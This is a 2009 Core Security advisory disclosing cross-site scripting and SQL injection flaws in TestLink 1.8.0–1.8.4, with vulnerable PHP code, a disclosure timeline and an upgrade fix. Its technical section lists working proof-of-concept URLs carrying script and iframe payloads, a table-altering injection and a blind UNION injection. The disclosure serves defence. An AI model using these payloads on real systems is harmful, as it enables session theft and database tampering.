Core Security Technologies Advisory 2009.1013

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Core Security Technologies - CoreLabs  
Advisory  
  
http://www.coresecurity.com/corelabs/  
  
Multiple XSS and Injection Vulnerabilities in TestLink Test Management  
and Execution System  
  
  
1. *Advisory Information*  
  
Title: Multiple XSS and Injection Vulnerabilities in TestLink Test  
Management and Execution System  
Advisory Id: CORE-2009-1013  
Advisory URL:  
http://www.coresecurity.com/content/testlink-multiple-injection-vulnerabilities  
Date published: 2009-12-09  
Date of last update: 2009-12-09  
Vendors contacted: TestLink Community  
Release mode: Coordinated release  
  
  
2. *Vulnerability Information*  
  
Class: Cross site scripting [CWE-79], SQL injection [CWE-89]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: No  
Bugtraq ID: 37258  
CVE Name: CVE-2009-4237, CVE-2009-4238  
  
  
3. *Vulnerability Description*  
  
Multiple injection (both XSS [1] and SQL) vulnerabilities have been  
discovered in Testlink [2], a widely used test-case management  
application written in PHP [3]. One of the XSS vulnerabilities,  
discovered in its login screen, can be exploited without an  
authenticated session.  
  
  
4. *Vulnerable packages*  
  
. TestLink 1.8.0  
. TestLink 1.8.1  
. TestLink 1.8.2  
. TestLink 1.8.3  
. TestLink 1.8.4  
. Older versions are probably affected too, but they were not checked.  
  
  
5. *Non-vulnerable packages*  
  
. TestLink 1.8.5  
  
  
6. *Solutions and Workarounds*  
  
Upgrade to a non-vulnerable version, such as 1.8.5. TestLink features  
the option to upgrade a current installation in its install scripts.  
  
  
7. *Credits*  
  
These vulnerabilities were discovered and researched by Pablo  
Annetta, from Core Security Technologies, during Core Bugweek 2009 as  
a member of the "Los Herederos de Don Pablo (HDP)" team.  
  
  
8. *Technical Description / Proof of Concept Code*  
  
Most of these vulnerabilities are present in the Testlink code  
because the logic for the sanitization of user input is rudimentary.  
Each script sanitizes its own input, instead of abstracting this task  
to another layer of logic. Often only slashes are stripped, but html  
entities are almost never escaped.  
  
The only vulnerability in this report that can be exploited without  
an authenticated session is a XSS vulnerability in Testlink's login  
page 'login.php'. This script gets a parameter named 'req', which is  
used by the application to set the next request to be made. All  
parameters are initialized in the 'init_args' function which doesn't  
sanitize its arguments appropriately as seen below.  
  
/-----  
function init_args()  
{  
$args = new stdClass();  
$_REQUEST = strings_stripSlashes($_REQUEST);  
  
$args->note = isset($_REQUEST['note']) ? $_REQUEST['note'] : null;  
$args->login = isset($_REQUEST['tl_login']) ?  
trim($_REQUEST['tl_login']) : null;  
$args->pwd = isset($_REQUEST['tl_password']) ?  
$_REQUEST['tl_password'] : null;  
  
$args->reqURI = isset($_REQUEST['req']) ? $_REQUEST['req'] : null;  
$args->preqURI = (isset($_REQUEST['reqURI']) &&  
strlen($_REQUEST['reqURI'])) ? $_REQUEST['reqURI'] : null;  
  
return $args;  
}  
- -----/  
  
This vulnerability can be verified by issuing the following request  
to a Testlink installation on localhost:  
  
/-----  
http://127.0.0.1/testlink/login.php?req="><iframe src  
="http://www.coresecurity.com/content/xxxx" width="100%"  
height="300"></iframe>  
- -----/  
  
  
Other XSS vulnerabilities on different scripts can be exploited with  
an authenticated session. Proof of concept code follows:  
  
/-----  
http://127.0.0.1/testlink/lib/general/staticPage.php?key="><script>alert(document.cookie)</script>  
  
http://127.0.0.1/testlink/lib/attachments/attachmentupload.php?id=1&tableName='<script>alert(document.cookie)</script>  
http://127.0.0.1/testlink/lib/events/eventviewer.php?startDate="<script>alert(document.cookie)</script>  
http://127.0.0.1/testlink/lib/events/eventviewer.php?endDate="<script>alert(document.cookie)</script>  
http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel="<script>alert(document.cookie)</script>  
- -----/  
  
  
There are more XSS attacks that can be executed with *an  
authenticated session* on installations that have *at least one test  
plan created*. Most of these are due to an 'echo' statement in  
TestLink's database functions that directly outputs SQL errors back to  
the browser without escaping html entities. This can be found on line  
181 of 'testlink/lib/functions/database.class.php', where some  
function such as 'htmlspecialchars' should be called on '  
$this->error($p_query)' and '$message'. A templating engine (TestLink  
uses Smarty for many other tasks) could also be used to output these  
errors.  
  
/-----  
if ( !$t_result ) {  
echo "ERROR ON exec_query() - database.class.php <br>" .  
$this->error($p_query) . "<br>";  
echo "<br> THE MESSAGE :: $message. "<br>";  
return false;  
} else {  
return $t_result;  
}  
- -----/  
  
This proof of concept code triggers the vulnerabilities described above:  
  
/-----  
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&expected_results='<script>alert(document.cookie)</script>  
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&name=<script>alert(document.cookie)</script>  
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&steps=<script>alert(document.cookie)</script>  
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='<script>alert(document.cookie)</script>  
- -----/  
  
More XSS vulnerabilities can also be triggered because of the problem  
described above, but also because another independent XSS exists on  
'resultsMoreBuilds_buildReport.php' caused by not escaping the  
'search_notes_string', by issuing this request (also when logged into  
an installation with a Test Plan created):  
  
/-----  
http://127.0.0.1/testlink/lib/results/resultsMoreBuilds_buildReport.php?report_type=0&display_query_params=1&search_notes_string=</td><script>alert(document.cookie)</script>  
- -----/  
  
  
With an authenticated session, the following SQL injection bug can  
also be exploited.  
  
In 'http://127.0.0.1/testlink/lib/general/navBar.php', filling in the  
'Test Case ID' field with 'TC-1 or 1 = 1 update tcversions set summary  
= '</td><script>alert(document.cookie)</script><td>'' results in  
reflected HTML.  
  
Also with an authenticated session the following blind SQL injection  
exists  
  
/-----  
http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel=1,1)%20union%20SELECT%20id%20FROM%20testplans%20%23  
- -----/  
  
  
9. *Report Timeline*  
  
. 2009-10-29:  
Core Security Technologies notifies Toshiyuki Kawanishi (at his  
@users.sourceforge.jp address) from the Teamst team of the  
vulnerabilities, offering a draft for this advisory in plaintext or  
encrypted form (if proper keys are sent). November 9th, 2009, is  
proposed as a release date.  
  
. 2009-11-02:  
Because no response was obtained from Toshiyuki at his  
@users.sourceforge.jp, Core Security Technologies tries to contact him  
using the "Contact" webform in http://www.teamst.org.  
  
. 2009-11-09:  
Since there is still no reply from Toshiyuki, Core now tries  
contacting Francisco Mancardi. November 23rd is now proposed as a  
release date.  
  
. 2009-11-09:  
Francisco Mancardi replies asking that a copy in plaintext of the  
advisory be sent to him, and also to Toshiyuki Kawanishi and Martin  
Havlat.  
  
. 2009-11-09:  
Core sends a draft for this advisory, including the technical  
description of the vulnerabilities, to Francisco Mancardi, Toshiyuki  
Kawanishi and Martin Havlat.  
  
. 2009-11-10:  
Martin Havlat replies acknowledging reception of the advisory draft,  
and tells Core that internal issue #2947 has been created in their bug  
tracking system to fix these bugs. He mentions these issues shall be  
fixed on release 1.8.5 of TestLink.  
  
. 2009-11-12:  
Core replies asking for more information regarding the release date of  
TestLink 1.8.5. An account is created by Core in TestLink's internal  
bug tracking system to access information about issue #2947.  
  
. 2009-11-17:  
Core requests again information regarding the release date of TestLink  
1.8.5 in order to schedule the release of this advisory accordingly,  
since no reply on this has been yet given by the TestLink developers  
contacted. Core also mentions that issue #2947 cannot be accessed by  
the user created in order to follow the development of a patch for the  
vulnerabilities reported here.  
  
. 2009-11-17:  
Francisco Mancardi replies specifying that "maybe [issue #2947] has  
private status".  
  
. 2009-11-20:  
Core asks once more for a release date for a fixed version of  
TestLink. The advisory is rescheduled for release on Monday 30th,  
November, since there is no information regarding the possibility of  
meeting the deadline of Monday 23rd by the TestLink team. Core also  
mentions that they are eager to passively monitor the progress of the  
TestLink developers in fixing these issues if access is given to issue  
#2947 to their created account on TestLink's bug tracking system.  
  
. 2009-11-26:  
Since there was no reply to their last e-mail, Core resends it,  
reminding the developers that their planned release date for the  
advisory is Monday 30th, and that they would like to know if there is  
a planned release date for a fixed version of TestLink. Core reminds  
the developers about their commitment in helping them in correctly  
fixing the bug, should they get access to private issue #2947.  
  
. 2009-11-27:  
Martin Havlat replies that due to priorities in the internal  
development group of Testlink the bug has not yet been fixed. He  
commits to release TestLink 1.8.5 as soon as this bug is fixed, but  
besides stating that he wished to have time to fix this himself, no  
firm or verifiable claim is made that can assure Core of a planned fix  
and release.  
  
. 2009-11-27:  
Core reschedules its internal publication date for this advisory to  
December 14th. This will be the final date and a user-release will be  
made, unless TestLink developers share information that can be  
verified by Core that shows commitment to eventually looking into said  
bugs and fixing them. Core suggests that developers actually in charge  
of these issues are copied in the e-mail loop, or that access to  
internal issue-tracking tools be given to them to actively participate  
in the discussions and the patching process.  
  
. 2009-11-30:  
Martin Havlat asks for technical details needed by him to confirm some  
of these vulnerabilities.  
  
. 2009-12-01:  
Core replies with the technical details needed by Martin Havlat.  
  
. 2009-12-02:  
Martin Havlat sends a patched version of TestLink to Core asking for  
verification of fixes to some of the vulnerabilities reported in this  
advisory.  
  
. 2009-12-03:  
Core replies saying that the fixes proposed by Martin Havlat fail to  
patch those specific vulnerabilities. The bugs are further researched  
by Core and the advisory draft is modified to include a more detailed  
explanation of these bugs. This technical information is shared by  
Core with Martin Havlat and some insight into possible fixes is also  
given.  
  
. 2009-12-09:  
TestLink 1.8.5 is released.  
  
. 2009-12-09:  
Advisory CORE-2009-1013 is published.  
  
  
10. *References*  
  
[1] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
[2] http://www.teamst.org/  
[3] http://www.owasp.org/index.php/PHP_Top_5  
  
  
11. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is  
charged with anticipating the future needs and requirements for  
information security technologies. We conduct our research in several  
important areas of computer security including system vulnerabilities,  
cyber attack planning and simulation, source code auditing, and  
cryptography. Our results include problem formalization,  
identification of vulnerabilities, novel solutions and prototypes for  
new technologies. CoreLabs regularly publishes security advisories,  
technical papers, project information and shared software tools for  
public use at: http://www.coresecurity.com/corelabs.  
  
  
12. *About Core Security Technologies*  
  
Core Security Technologies develops strategic solutions that help  
security-conscious organizations worldwide develop and maintain a  
proactive process for securing their networks. The company's flagship  
product, CORE IMPACT, is the most comprehensive product for performing  
enterprise security assurance testing. CORE IMPACT evaluates network,  
endpoint and end-user vulnerabilities and identifies what resources  
are exposed. It enables organizations to determine if current security  
investments are detecting and preventing attacks. Core Security  
Technologies augments its leading technology solution with world-class  
security consulting services, including penetration testing and  
software security auditing. Based in Boston, MA and Buenos Aires,  
Argentina, Core Security Technologies can be reached at 617-399-6980  
or on the Web at http://www.coresecurity.com.  
  
  
13. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2009 Core Security  
Technologies and (c) 2009 CoreLabs, and may be distributed freely  
provided that no fee is charged for this distribution and proper  
credit is given.  
  
  
14. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
Comment: GnuPT v3.6.3  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iEYEARECAAYFAksgL9IACgkQyNibggitWa3csgCfdV5dyeDFf1r+/yNIO6PpDgvk  
LJgAoKTesYDuoe6SpJzMhPKujbi1Z0vV  
=H22d  
-----END PGP SIGNATURE-----  
`